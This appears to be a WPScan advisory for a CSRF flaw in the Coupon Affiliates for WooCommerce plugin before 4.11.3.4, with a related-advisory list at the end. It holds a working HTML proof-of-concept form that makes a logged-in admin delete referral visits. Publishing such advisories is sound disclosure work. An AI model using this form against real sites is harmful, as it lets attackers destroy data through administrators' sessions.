Coupon Affiliates for WooCommerce < 4.11.3.4 – Arbitrary Referral Visits Deletion via CSRF | Plugin Vulnerabilities

Description

The plugin does not have any CSRF in place when deleting Referral Visits, which could allow attackers to make a logged in admin delete them via a CSRF attack

Proof of Concept

<html>
  <body>
    <form action="httsp://example.com/wp-admin/admin.php?page=wcusage_clicks" method="POST">
      <input type="hidden" name="wcu-status-delete" value="a" />
      <input type="hidden" name="wcu-id" value="42" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugins

woo-coupon-usage

Fixed in 4.11.3.4

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

WPScanTeam

Verified

Yes

WPVDB ID

d592b286-ae8d-445a-b674-b5eaaa0a6b72

Timeline

Publicly Published

2021-10-11 (about 4 years ago)

Added

2021-10-11 (about 4 years ago)

Last Updated

2021-10-11 (about 4 years ago)

Other

Published

Title

Published

2025-04-09

Title

RentSyst < 2.0.93 - Stored XSS via CSRF

Published

2025-03-11

Title

Rankchecker.io Integration <= 1.0.9 - Cross-Site Request Forgery to Stored Cross-Site Scripting

Published

2025-04-10

Title

Restrict User Registration <= 1.0.1 Cross-Site Request Forgery to Stored Cross-Site Scripting

Published

2025-10-14

Title

FunKItools <= 1.0.2 - Cross-Site Request Forgery to Settings Update

Published

2022-12-02

Title

Chained Quiz < 1.3.2.5 - Arbitrary Question Deletion via CSRF